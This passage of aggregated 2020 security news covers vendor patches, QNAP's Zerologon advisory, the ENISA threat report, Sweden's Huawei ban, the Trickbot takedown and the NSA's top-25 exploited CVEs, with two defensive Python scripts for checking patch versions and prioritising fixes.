The company also fixed multiple vulnerabilities that require local access or authentication to be exploited; an attacker can trigger them to read or write files on a device, cause a DoS condition, bypass the secure boot mechanism, or escape containers and execute commands with root privileges.

The good news is that Cisco is not aware of attacks in the wild exploiting these vulnerabilities.

Cisco is also warning of attacks targeting the CVE-2020-3118 high severity vulnerability that affects multiple carrier-grade routers running the Cisco IOS XR Software.

The flaw resides in the Discovery Protocol implementation for Cisco IOS XR Software and could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a reload of an affected device.

Pierluigi Paganini


Taiwanese vendor QNAP issues advisory on Zerologon flaw

Taiwanese vendor QNAP published an advisory to warn customers that certain versions of its NAS OS (QTS) are affected by the Zerologon vulnerability.

The Taiwanese vendor QNAP has published an advisory to warn customers that certain versions of the operating system for its network-attached storage (NAS) devices, known as QTS, are affected by the Zerologon vulnerability (CVE-2020-1472).

The CVE-2020-1472 flaw is an elevation-of-privilege issue that resides in the Netlogon service. Netlogon is an authentication mechanism used in the Windows Client Authentication Architecture: it verifies logon requests and registers, authenticates, and locates Domain Controllers.

Administrators of enterprise Windows servers have to install the August 2020 Patch Tuesday updates to mitigate the “unacceptable risk” the flaw poses to federal networks.

An attacker could also exploit the flaw to disable security features in the Netlogon authentication process and change a computer’s password on the domain controller’s Active Directory.

The only limitation on how to carry out a Zerologon attack is that the attacker must have access to the target network.

The flaw was discovered by researchers from the security firm Secura that also published technical details of the issue along with proof-of-concept exploits.

On September 18, the US CISA issued an Emergency Directive requiring federal agencies to install the available patches within three days.

Threat actors immediately started targeting the vulnerability in attacks in the wild, including Iranian APT groups and at least one Russian cybercrime gang.

QNAP has already released security updates to address the Zerologon flaw in its products, to prevent attackers from using its NAS devices to take over entire networks.

“The Zerologon vulnerability has been reported to affect some versions of QTS.” reads the advisory issued by the vendor. “If exploited, this elevation of privilege vulnerability allows remote attackers to bypass security measures via a compromised QTS device on the network.”

Threat actors can exploit the issue in the NAS if users have configured the device as a domain controller in Control Panel > Network & File Services > Win/Mac/NFS > Microsoft Networking.

QNAP has already addressed the Zerologon vulnerability in the following software versions:

  • QTS 4.5.1.1456 build 20201015 and later
  • QTS 4.4.3.1439 build 20200925 and later
  • QTS 4.3.6.1446 build 20200929 and later
  • QTS 4.3.4.1463 build 20201006 and later
  • QTS 4.3.3.1432 build 20201006 and later

The company pointed out that QTS 2.x and QES are not affected by this flaw.
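A version check for the fixed releases listed above, written as an added example for this post rather than anything QNAP ships. The fixed version and build numbers are the ones from the advisory quoted above; the version-string format, the branch-matching logic and the domain-controller gating (the advisory says the issue only matters when the NAS is configured as a domain controller) are assumptions of this example.

```python
"""Decide whether a QTS release is covered by QNAP's Zerologon (CVE-2020-1472) fix.

Added example, not QNAP tooling. The fixed (version, build) pairs come from the
advisory; the parsing and comparison logic below are this example's own assumptions.
"""
import re
from typing import Tuple

# Fixed releases from the QNAP advisory, keyed by the x.y.z branch.
# Anything at or above the listed version/build in the same branch is patched.
FIXED_QTS_RELEASES = {
    "4.5.1": ((4, 5, 1, 1456), 20201015),
    "4.4.3": ((4, 4, 3, 1439), 20200925),
    "4.3.6": ((4, 3, 6, 1446), 20200929),
    "4.3.4": ((4, 3, 4, 1463), 20201006),
    "4.3.3": ((4, 3, 3, 1432), 20201006),
}

# Assumed input format: "QTS 4.5.1.1456 build 20201015" (the "QTS " prefix is optional,
# "build" is matched case-insensitively since the advisory mixes "build" and "Build").
_VERSION_RE = re.compile(
    r"^(?:QTS\s+)?(\d+)\.(\d+)\.(\d+)\.(\d+)\s+build\s+(\d{8})$", re.IGNORECASE
)


def parse_qts_version(text: str) -> Tuple[Tuple[int, int, int, int], int]:
    """Return ((major, minor, patch, revision), build_date) or raise ValueError."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised QTS version string: {text!r}")
    version = tuple(int(x) for x in m.groups()[:4])
    build = int(m.group(5))
    return version, build  # type: ignore[return-value]


def zerologon_status(text: str) -> str:
    """Classify a QTS version against the advisory's fixed releases.

    Returns one of:
      "patched"        - same branch as a fixed release, at or above the fixed build
      "vulnerable"     - same branch, below the fixed build
      "not-affected"   - QTS 2.x, which the advisory says is unaffected
      "unknown-branch" - a branch the advisory does not list; treat as needing review
    """
    version, build = parse_qts_version(text)
    if version[0] == 2:
        return "not-affected"
    branch = ".".join(str(n) for n in version[:3])
    fixed = FIXED_QTS_RELEASES.get(branch)
    if fixed is None:
        return "unknown-branch"
    # Tuple comparison: the four-part version is primary, the build date breaks ties.
    return "patched" if (version, build) >= fixed else "vulnerable"


def exposure(text: str, configured_as_domain_controller: bool) -> str:
    """Combine the version check with the advisory's precondition.

    The post notes the issue is only reachable when the NAS acts as a domain
    controller (Control Panel > Network & File Services > Win/Mac/NFS >
    Microsoft Networking), so an unpatched device that is not a DC is flagged
    as "update-advised" rather than "exposed".
    """
    status = zerologon_status(text)
    if status in ("patched", "not-affected"):
        return status
    if not configured_as_domain_controller:
        return "update-advised"
    return "exposed"


if __name__ == "__main__":
    # Constructed sample inventory, not real device data.
    inventory = [
        ("QTS 4.5.1.1456 build 20201015", True),
        ("QTS 4.4.3.1400 build 20200801", True),
        ("QTS 4.3.6.1446 Build 20200901", False),
        ("QTS 4.2.6.0001 build 20190101", True),
    ]
    for ver, is_dc in inventory:
        print(f"{ver:32} dc={is_dc!s:5} -> {exposure(ver, is_dc)}")
```

Run it as a script to see the constructed inventory classified; in practice the version string would be read from each device and the DC flag from its configuration.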


QNAP users are advised to update QTS to the latest available version and to ensure that all other applications on their devices are up to date.

QNAP’s advisory also includes details on how to install the QTS update and how to update all installed applications.

Pierluigi Paganini


Sopra Steria hit by cyber attack. IT services group suspected of falling victim to ransomware

European IT services group Sopra Steria has been hit by a cyber attack. Which would be unfortunate for any business at the best of times, but is possibly even more galling for a firm like Sopra Steria which has a specialist cybersecurity branch which claims to help customers “protect sensitive information, and prevent costly data breaches.”

ENISA Threat Landscape Report 2020

According to the ENISA Threat Landscape Report 2020, cyberattacks are becoming more sophisticated, targeted, and in many cases undetected.

I’m proud to present the ENISA Threat Landscape Report 2020, the annual report published by ENISA that provides insights into the evolution of cyber threats for the period January 2019-April 2020.

The 8th annual ENISA Threat Landscape (ETL) report was compiled by the European Union Agency for Cybersecurity (ENISA), with the support of the European Commission, EU Member States and the CTI Stakeholders Group.

It is an amazing work that identifies and evaluates the top cyber threats for the period January 2019-April 2020.

This year the report has a different format that allows readers to focus on the threat of interest. The publication is divided into 22 different reports, which are available in both PDF and ebook form.

The report provides details on the threats that characterized the period of analysis and highlights, as the major change from the 2018 threat landscape, the COVID-19-led transformation of the digital environment.

“During the pandemic, cyber criminals have been seen advancing their capabilities, adapting quickly and targeting relevant victim groups more effectively. (Infographic – Threat Landscape Mapping during COVID-19).” states the report.


The ETL report provides strategic and technical analysis of the events; it was created to provide relevant information to both technical and non-technical readers.

For a better understanding of how the ETL is structured, we recommend reading “The Year in Review” report first; the table that follows in the publication helps readers focus on the section of interest.

The report highlights the importance of cyber threat intelligence in responding to increasingly automated attacks that leverage automated tools and skills.

Another element of concern is the spread of IoT devices; in many cases, smart objects are exposed online without protection.

Below are the main trends reported in the document:

  • Attack surface in cybersecurity continues to expand as we are entering a new phase of the digital transformation.
  • There will be a new social and economic norm after the COVID-19 pandemic even more dependent on a secure and reliable cyberspace.
  • The use of social media platforms in targeted attacks is a serious trend and reaches different domains and types of threats.
  • Finely targeted and persistent attacks on high-value data (e.g. intellectual property and state secrets) are being meticulously planned and executed by state-sponsored actors.
  • Massively distributed attacks with a short duration and wide impact are used with multiple objectives such as credential theft.
  • The motivation behind the majority of cyberattacks is still financial.
  • Ransomware remains widespread with costly consequences to many organisations.
  • Still many cybersecurity incidents go unnoticed or take a long time to be detected.
  • With more security automation, organisations will invest more in preparedness, using Cyber Threat Intelligence as their main capability.
  • The number of phishing victims continues to grow since it exploits the human dimension being the weakest link.

Let me close with the Top Threats 2020; for each threat the report includes detailed information on trends and observed evolution.


Enjoy it!

Pierluigi Paganini


VMware fixes several flaws in its ESXi, Workstation, Fusion and NSX-T

VMware patched several flaws in its ESXi, Workstation, Fusion and NSX-T products, including a critical code execution vulnerability.

VMware has fixed several vulnerabilities in its ESXi, Workstation, Fusion and NSX-T products, including a critical flaw that allows arbitrary code execution.

The critical vulnerability, tracked as CVE-2020-3992, is a use-after-free issue that affects the OpenSLP service in ESXi. The vulnerability can allow remote attackers to execute arbitrary code on affected installations of the ESXi product.

An attacker needs to be on the management network and have access to port 427 on an ESXi machine in order to exploit the vulnerability.

“OpenSLP as used in ESXi has a use-after-free issue. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.” reads the advisory published by VMware.

“A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution.”

The vulnerability was reported to VMware on July 22 by Lucas Leong (@_wmliang_) from Trend Micro’s Zero Day Initiative.

The virtualization giant addressed the vulnerability in ESXi and VMware Cloud Foundation.

The company also patched a high-severity flaw in NSX-T, tracked as CVE-2020-3993, which is caused by the way a KVM host is allowed to download and install packages from the NSX manager. The flaw could be exploited by a MitM attacker to compromise transport nodes.

“VMware NSX-T contains a security vulnerability that exists in the way it allows a KVM host to download and install packages from NSX manager. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5.” reads the advisory.

“A malicious actor with MITM positioning may be able to exploit this issue to compromise the transport node.”

Researcher Reno Robert discovered an out-of-bounds read vulnerability in VMware ESXi, Workstation and Fusion. The issue is due to a time-of-check time-of-use condition in the ACPI device.

An attacker with administrative access to a virtual machine may be able to exploit this flaw to leak memory from the vmx process.

VMware also addressed CVE-2020-3994, a session hijack vulnerability in the vCenter Server update function.

“A malicious actor with network positioning between vCenter Server and an update repository may be able to perform a session hijack when the vCenter Server Appliance Management Interface is used to download vCenter updates.” reads the advisory.

The vulnerability was reported by Thorsten Tüllmann of the Karlsruhe Institute of Technology.

Pierluigi Paganini


How tech trends and risks shape organizations’ data protection strategy

Trustwave released a report which depicts how technology trends, compromise risks and regulations are shaping how organizations’ data is stored and protected. Data protection strategy The report is based on a recent survey of 966 full-time IT professionals who are cybersecurity decision makers or security influencers within their organizations. Over 75% of respondents work in organizations with over 500 employees in key geographic regions including the U.S., U.K., Australia and Singapore. “Data drives the global … More

The post How tech trends and risks shape organizations’ data protection strategy appeared first on Help Net Security.

Smashing Security podcast #201: Robin Hood, Flippy, and the web ad bubble

The Darkside ransomware gang thinks it's a modern-day Robin Hood when it donates extorted Bitcoins to charity, the micro-targeted ad industry could pop like a bubble, and would you trust a burger-flipping robot? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Tim Hwang.

Adobe releases a new set of out-of-band patches for its products

Adobe has released a second out-of-band security update to address critical vulnerabilities affecting several products. 

Adobe has released a second out-of-band security update to fix critical vulnerabilities that impact numerous products of the IT giant. 

The flaws impact Adobe Illustrator, Dreamweaver, Marketo, Animate, After Effects, Photoshop, Premiere Pro, Media Encoder, InDesign, and the Creative Cloud desktop application on Windows and macOS machines. 

Adobe has addressed seven critical vulnerabilities in Illustrator, including memory corruption and out-of-bounds read/write issues that can lead to arbitrary code execution.

Below are the vulnerability details:

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
Out-of-Bounds Read | Arbitrary code execution | Critical | CVE-2020-24409, CVE-2020-24410
Out-of-Bounds Write | Arbitrary code execution | Critical | CVE-2020-24411
Memory Corruption | Arbitrary code execution | Critical | CVE-2020-24412, CVE-2020-24413, CVE-2020-24414, CVE-2020-24415

Adobe has addressed an “important” uncontrolled search path element security flaw in Dreamweaver which could be exploited by attackers to escalate privileges.

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
Uncontrolled Search Path Element | Privilege Escalation | Important | CVE-2020-24425

The company fixed four critical vulnerabilities in Animate: out-of-bounds read, stack-based buffer overflow, and double-free flaws that can result in arbitrary code execution.

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
Double-free | Arbitrary code execution | Critical | CVE-2020-9747
Stack-based buffer overflow | Arbitrary code execution | Critical | CVE-2020-9748
Out-of-bounds read | Arbitrary code execution | Critical | CVE-2020-9749, CVE-2020-9750

Adobe addressed an “important” XSS issue impacting the Marketo Sales Insight Salesforce package that could have been weaponized to deploy malicious JavaScript in a browser session. 

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
Cross-site Scripting (stored) | JavaScript execution in the browser | Important | CVE-2020-24416

Adobe addressed an out-of-bounds read flaw and an uncontrolled search path flaw in After Effects, both rated critical, that could lead to the execution of malicious code.

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
Out-of-Bounds Read | Arbitrary code execution | Critical | CVE-2020-24418
Uncontrolled search path | Arbitrary code execution | Critical | CVE-2020-24419

Adobe has fixed a critical memory corruption flaw in InDesign that could also be exploited to execute arbitrary code. 

Vulnerability Category | Vulnerability Impact | Severity | CVE Number
Memory Corruption | Arbitrary code execution | Critical | CVE-2020-24421

The company also fixed other critical uncontrolled search path issues in Photoshop, Premiere Pro, Media Encoder, and the Creative Cloud installer for desktop.

Last week, Adobe released a separate set of out-of-band security patches for the Magento platform.

Pierluigi Paganini


Sweden bans Huawei and ZTE from building its 5G infrastructure

Sweden is banning Chinese tech giant Huawei and ZTE from building new 5G wireless networks due to national security concerns.

Sweden is the latest state to announce a ban on the Chinese tech companies Huawei and ZTE from building its 5G network infrastructure.

The Swedish Post and Telecom Authority announced this week that four wireless carriers bidding for frequencies in an upcoming spectrum auction for the new 5G networks (Hi3G Access, Net4Mobility, Telia Sverige and Teracom) cannot use network equipment from the Chinese firms.

The Swedish telecom regulator is also urging carriers to replace any existing equipment from Huawei or ZTE by January 1st, 2025, at the latest.

The decision is the result of assessments made by the Swedish military and security service.

“In accordance with new legislation, which entered into force on 1 January 2020, an examination of applications has been conducted in consultation with the Swedish Armed Forces and the Swedish Security Service, to ensure that the use of radio equipment in these bands does not cause harm to Sweden’s security.” reads a press release published by the Swedish Post and Telecom Authority.

The ban applies to new installations and new implementations of central functions for radio use in the frequency bands.

Sweden is the latest country to ban Huawei from participating in building 5G networks.

Recently the Belgian telecoms operators Orange Belgium and Proximus announced that they will gradually replace the equipment from the Chinese manufacturer Huawei.


The U.S. is pushing its allies to ban Huawei, ZTE and other Chinese companies. Washington has highlighted the risks to national security posed by the adoption of Huawei equipment and is urging internet providers and telco operators in allied countries to ban Chinese firms.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United States, Australia, New Zealand, Romania, and Japan announced the exclusion of Huawei technology from their 5G internet networks.

In April 2018, the UK GCHQ intelligence agency warned UK telecom firms of the risks of using ZTE equipment and services in their infrastructure.

In December 2018, the Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

In September, the US Federal Communications Commission (FCC) estimated the cost of a full replacement of all Huawei and ZTE hardware on American wireless networks at $1.837bn.

Klas Friberg, the head of Sweden’s domestic security service (SAPO), declared that foreign states have intensified their intelligence activity and that protecting 5G networks from cyber espionage and hacking campaigns by threat actors is crucial for homeland security.

“China is one of the biggest threats to Sweden,” Friberg said. “The Chinese state is conducting cyber espionage to promote its own economic development and develop its military capabilities. This is done through extensive intelligence gathering and theft of technology, research and development. This is what we must consider when building the 5G network of the future.”

Huawei was “surprised and disappointed” by the decision of the Swedish authority.

“Huawei has never caused even the slightest shred of threat to Swedish cyber security and never will,” reads a statement from the Chinese giant Huawei. “Excluding Huawei will not make Swedish 5G networks any more secure. Rather, competition and innovation will be severely hindered.”

Pierluigi Paganini


Chrome 86.0.4240.111 fixes actively exploited CVE-2020-15999 zero-day

Google has released Chrome version 86.0.4240.111 that also addresses the CVE-2020-15999 flaw which is an actively exploited zero-day.

Google has released Chrome version 86.0.4240.111 that includes security fixes for several issues, including a patch for an actively exploited zero-day vulnerability tracked as CVE-2020-15999.

The CVE-2020-15999 flaw is a memory corruption bug that resides in the FreeType font rendering library, which is included in standard Chrome releases.

White hat hackers from the Google Project Zero team spotted attacks exploiting the vulnerability in the wild.

The researchers did not disclose technical details about the attacks exploiting the CVE-2020-15999 in the wild to avoid mass exploitation from threat actors.

Google Project Zero is recommending other app development teams who use the same FreeType library to update their software as well.

FreeType version 2.10.4 addresses this issue.

Chrome users can update their install to v86.0.4240.111 via the browser’s built-in update function.

Experts pointed out that since the patch for this zero-day is visible in the source code of the open-source FreeType library, threat actors will be able to reverse-engineer the fix and develop working exploits for the issue.

In the last twelve months, Google addressed another two zero-day vulnerabilities, tracked as CVE-2019-13720 (Oct. 2019) and CVE-2020-6418 (Feb. 2020) respectively.

Pierluigi Paganini


Microsoft took down 120 of 128 Trickbot servers in recent takedown

Microsoft brought down the TrickBot infrastructure last week, but a few days later the botmasters set up new command and control (C&C) servers.

Microsoft’s Defender team, FS-ISAC, ESET, Lumen’s Black Lotus Labs, NTT, and Broadcom’s cyber-security division Symantec joined forces and announced last week a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.

Even though Microsoft and its partners brought down the TrickBot infrastructure, the TrickBot operators attempted to resume operations by setting up new command and control (C&C) servers.


Microsoft provided an update on its takedown efforts and announced a new wave of takedown actions against TrickBot.

According to the IT giant, the operation conducted last week has taken down 94% of the servers composing the Trickbot infrastructure. Trickbot enables ransomware attacks which have been identified as one of the biggest threats to the upcoming U.S. elections. 

“We initially identified 69 servers around the world that were core to Trickbot’s operations, and we disabled 62 of them. The seven remaining servers are not traditional command-and-control servers but rather internet of things (IoT) devices Trickbot infected and was using as part of its server infrastructure; these are in the process of being disabled. As expected, the criminals operating Trickbot scrambled to replace the infrastructure we initially disabled. We tracked this activity closely and identified 59 new servers they attempted to add to their infrastructure.” said Tom Burt, CVP of Customer Security and Trust at Microsoft. “We’ve now disabled all but one of these new servers. In sum, from the time we began our operation until October 18, we have taken down 120 of the 128 servers we identified as Trickbot infrastructure around the world.”

Microsoft has taken down 120 of the 128 servers that were composing the Trickbot infrastructure.

Microsoft announced that it had taken down 62 of the original 69 TrickBot C&C servers; the seven servers that could not be brought down last week were Internet of Things (IoT) devices.

Microsoft also revealed that the operators tried to resume operations: the company brought down 58 of the 59 servers the operators attempted to bring online after the takedown.

Burt praised the role of Microsoft’s lawyers who quickly requested new court orders to take down the new servers set up by the Trickbot operators in response to the takedown.

“We have identified new Trickbot servers, located their respective hosting provider, determined the proper legal methodology to take action, and completely disabled those servers in less than three hours. Our global coordination has allowed a provider to take quick action as soon as we notify them – in one case, in less than six minutes.” continues Burt. “What we’re seeing suggests Trickbot’s main focus has become setting up new infrastructure, rather than initiating fresh attacks, and it has had to turn elsewhere for operational help.”

Currently, a few Trickbot C2 servers are still active and the operators are using them to control the botnet. Researchers from the cyber-security firm Intel 471 reported that these servers are based in Brazil, Colombia, Indonesia, and Kyrgyzstan, and that they are still able to respond to Trickbot bot requests.

“This small number of working control servers was not listed in the most recent distributed Trickbot sample.” states Intel 471.

Burt pointed out that TrickBot operators are working to restore their infrastructure instead of conducting new attacks.

“We fully expect that Trickbot’s operators will continue looking for ways to stay operational, and we and our partners will continue to monitor them and take action.” Microsoft concludes. “We encourage others in the security community who believe in protecting the elections to join the effort and share their intelligence directly with hosting providers and ISPs that can take Trickbot’s infrastructure offline.”

Pierluigi Paganini

(SecurityAffairs – hacking, botnet)

The post Microsoft took down 120 of 128 Trickbot servers in recent takedown appeared first on Security Affairs.

NSA details top 25 flaws exploited by China-linked hackers

The US National Security Agency (NSA) has shared the list of top 25 vulnerabilities exploited by Chinese state-sponsored hacking groups in attacks in the wild.

The US National Security Agency (NSA) has published a report that includes details of the top 25 vulnerabilities that are currently being exploited by China-linked APT groups in attacks in the wild.

Knowing which vulnerabilities are being actively targeted allows IT and security staff at organizations worldwide to prioritize the hardening of their infrastructure against Chinese state-sponsored hacking campaigns.

The report includes well-known vulnerabilities that have already been addressed by their vendors.

“This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks.” reads the report. “The majority of the products are either for remote access (T1133) or for external web services (T1190), and should be prioritized for immediate patching.”

For each entry, the report includes a description of the vulnerability and the recommended mitigations.

Exploits for many of these vulnerabilities are publicly available and are used by multiple threat actors, not only China-linked groups, in attacks in the wild.

Most of the vulnerabilities can be exploited to gain initial access to target networks, because they affect systems that are directly reachable from the Internet, such as VPN appliances, load balancers and other gateway devices.

NSA confirmed it is aware that National Security Systems, Defense Industrial Base and Department of Defense networks are consistently scanned, targeted and exploited by Chinese state-sponsored cyber actors. The agency recommends that owners of critical systems address these vulnerabilities to mitigate the risk of losing sensitive information that could have a significant impact on U.S. policies, strategies, plans and competitive advantage.

The list includes:

1) CVE-2019-11510 – In Pulse Secure VPNs, an unauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file read vulnerability. This may lead to exposure of keys or passwords.

2) CVE-2020-5902 – In F5 BIG-IP proxy / load balancer devices, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

3) CVE-2019-19781 – An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway. They allow directory traversal, which can lead to remote code execution without credentials.

4+5+6) CVE-2020-8193, CVE-2020-8195, CVE-2020-8196 – Improper access control and input validation in Citrix ADC, Citrix Gateway and Citrix SD-WAN WANOP allow unauthenticated access to certain URL endpoints and information disclosure to low-privileged users.

7) CVE-2019-0708 (aka BlueKeep) – A remote code execution vulnerability exists within Remote Desktop Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests.

8) CVE-2020-15505 – A remote code execution vulnerability in the MobileIron mobile device management (MDM) software allows remote attackers to execute arbitrary code and take over remote company servers.

9) CVE-2020-1350 (aka SIGRed) – A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests.

10) CVE-2020-1472 (aka Zerologon) – An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC).

11) CVE-2019-1040 – A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection.

12) CVE-2018-6789 – Sending a handcrafted message to an Exim mail transfer agent may cause a buffer overflow. This can be used to execute code remotely and take over email servers.

13) CVE-2020-0688 – A Microsoft Exchange validation key remote code execution vulnerability exists when the software fails to properly handle objects in memory.

14) CVE-2018-4939 – Certain Adobe ColdFusion versions have an exploitable deserialization of untrusted data vulnerability. Successful exploitation could lead to arbitrary code execution.

15) CVE-2015-4852 – The WLS Security component in Oracle WebLogic Server allows remote attackers to execute arbitrary commands via a crafted serialized Java object.

16) CVE-2020-2555 – A vulnerability exists in the Oracle Coherence product of Oracle Fusion Middleware. This easily exploitable vulnerability allows an unauthenticated attacker with network access via T3 to compromise Oracle Coherence systems.

17) CVE-2019-3396 – The Widget Connector macro in Atlassian Confluence Server allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

18) CVE-2019-11580 – Attackers who can send requests to an Atlassian Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution.

19) CVE-2020-10189 – Zoho ManageEngine Desktop Central allows remote code execution because of deserialization of untrusted data.

20) CVE-2019-18935 – Progress Telerik UI for ASP.NET AJAX contains a .NET deserialization vulnerability. Exploitation can result in remote code execution.

21) CVE-2020-0601 (aka CurveBall) – A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.

22) CVE-2019-0803 – An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory.

23) CVE-2017-6327 – The Symantec Messaging Gateway can encounter a remote code execution issue.

24) CVE-2020-3118 – A vulnerability in the Cisco Discovery Protocol implementation for Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a reload of an affected device.

25) CVE-2020-8515 – DrayTek Vigor devices allow remote code execution as root (without authentication) via shell metacharacters.
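The practical use of a list like this is to cross it with what you actually run and decide what to patch first, which is what the following added example does. It is not part of the NSA advisory or of this post: the per-CVE impact and "unauthenticated" tags are my own reading of the descriptions above and of the public vendor advisories (None where the summary does not say), the asset inventory is constructed for the example, and the scoring weights are an assumption that favours Internet-facing hosts, as the advisory itself recommends.

```python
"""Rank the NSA top-25 CVEs against an asset inventory, highest risk first.

Tags in NSA_TOP25 are my own summary of the descriptions in the list above,
not fields of the advisory. INVENTORY is constructed for the example.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Flaw:
    cve: str
    product: str             # product tag the inventory uses
    impact: str              # "rce", "file-read", "eop", "info", "spoof", "tamper"
    unauth: Optional[bool]   # True = no credentials needed; None = not stated / unsure


NSA_TOP25 = [
    Flaw("CVE-2019-11510", "pulse-secure-vpn", "file-read", True),
    Flaw("CVE-2020-5902", "f5-big-ip", "rce", None),
    Flaw("CVE-2019-19781", "citrix-adc", "rce", True),
    Flaw("CVE-2020-8193", "citrix-adc", "info", True),
    Flaw("CVE-2020-8195", "citrix-adc", "info", False),
    Flaw("CVE-2020-8196", "citrix-adc", "info", False),
    Flaw("CVE-2019-0708", "windows-rdp", "rce", True),
    Flaw("CVE-2020-15505", "mobileiron-mdm", "rce", True),
    Flaw("CVE-2020-1350", "windows-dns-server", "rce", True),
    Flaw("CVE-2020-1472", "windows-domain-controller", "eop", True),
    Flaw("CVE-2019-1040", "windows", "tamper", None),
    Flaw("CVE-2018-6789", "exim", "rce", True),
    Flaw("CVE-2020-0688", "exchange", "rce", False),
    Flaw("CVE-2018-4939", "coldfusion", "rce", None),
    Flaw("CVE-2015-4852", "weblogic", "rce", True),
    Flaw("CVE-2020-2555", "oracle-coherence", "rce", True),
    Flaw("CVE-2019-3396", "confluence", "rce", True),
    Flaw("CVE-2019-11580", "atlassian-crowd", "rce", True),
    Flaw("CVE-2020-10189", "manageengine-desktop-central", "rce", True),
    Flaw("CVE-2019-18935", "telerik-ui", "rce", None),
    Flaw("CVE-2020-0601", "windows", "spoof", None),
    Flaw("CVE-2019-0803", "windows", "eop", False),
    Flaw("CVE-2017-6327", "symantec-messaging-gateway", "rce", None),
    Flaw("CVE-2020-3118", "cisco-ios-xr", "rce", True),
    Flaw("CVE-2020-8515", "draytek-vigor", "rce", True),
]

# Constructed inventory: each asset lists the product tags it runs, whether it is
# reachable from the Internet (the advisory's T1133/T1190 initial-access concern)
# and which of the advisory CVEs are already patched on it.
INVENTORY = [
    {"host": "vpn-01", "products": {"pulse-secure-vpn"}, "internet_facing": True, "patched": {"CVE-2019-11510"}},
    {"host": "adc-edge", "products": {"citrix-adc"}, "internet_facing": True, "patched": set()},
    {"host": "dc-01", "products": {"windows", "windows-domain-controller", "windows-dns-server"},
     "internet_facing": False, "patched": set()},
    {"host": "wiki", "products": {"confluence"}, "internet_facing": False, "patched": {"CVE-2019-3396"}},
    {"host": "mail-edge", "products": {"exim"}, "internet_facing": True, "patched": set()},
]


def risk_score(flaw: Flaw, asset: dict) -> int:
    """Assumed weighting: exposure counts most, then impact, then lack of auth."""
    score = 4 if asset["internet_facing"] else 0
    if flaw.impact == "rce":
        score += 3
    elif flaw.impact in ("eop", "file-read"):
        score += 2
    else:
        score += 1
    if flaw.unauth is True:
        score += 2
    elif flaw.unauth is None:
        score += 1   # unknown: do not assume a login protects it
    return score


def patch_queue(inventory, flaws=NSA_TOP25):
    """(host, cve, score) for every unpatched advisory CVE on every asset, worst first."""
    queue = []
    for asset in inventory:
        for flaw in flaws:
            if flaw.product in asset["products"] and flaw.cve not in asset["patched"]:
                queue.append((asset["host"], flaw.cve, risk_score(flaw, asset)))
    queue.sort(key=lambda row: (-row[2], row[0], row[1]))
    return queue


if __name__ == "__main__":
    for host, cve, score in patch_queue(INVENTORY):
        print(f"{score:2d}  {host:10s} {cve}")
```

With the constructed inventory the unpatched Citrix ADC and Exim hosts on the perimeter come out on top, the domain controller's SIGRed and Zerologon exposure follows, and anything already patched is dropped. Matching on product tags is deliberately coarse; a real run should key on the version ranges in the vendor advisories rather than on product names alone.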

Pierluigi Paganini

(SecurityAffairs – hacking, NSA)

The post NSA details top 25 flaws exploited by China-linked hackers appeared first on Security Affairs.

How Automation can help you in Managing Data Privacy

The global data privacy landscape is changing, and every day we can see new regulations emerge.

These regulations encourage organizations to be better custodians of consumer data and to create a healthier space for data privacy. In order to do so, organizations will need to rework their operations and revamp their processes to comply with these regulations.

According to a report by the International Association of Privacy Professionals, 33% of respondents have considered revamping their technology solutions around data privacy. This is where privacy management software comes into play: organizations are looking for tools that can fulfill their data privacy needs while complying with data regulations in order to avoid fines.

Tracking Personal Data

Data is stored in a plethora of internal and external systems, in structured or unstructured form, all across the organization, and these systems can be geographically dispersed depending on the size of the organization. Retrieving information by manual methods is tedious and time-consuming, not to mention prone to human error.

According to Aoife Harney, Compliance Manager at AON, “One of the most important aspects of any data protection program is having an in-depth and documented knowledge of the what, the why, the where, the who, and the how.”

Different data privacy software products that incorporate data intelligence serve various purposes in the organization. Some deal with cookies and consent, while others focus on breach notification.

Nowadays, organizations need an all-in-one privacy management platform that can address all these requirements and integrate data privacy within all their operations.

Compliance Requirements

Data privacy regulations such as the CCPA and GDPR require organizations to take responsibility for their consumers’ data. All data privacy regulations impose obligations on businesses to protect consumer privacy by restricting data capture mechanisms, granting consumers rights over their personal data and introducing accountability into business data policies. Furthermore, they make data controllers who store and hold data responsible for protecting it from unauthorized disclosure and for informing consumers when their data is breached.

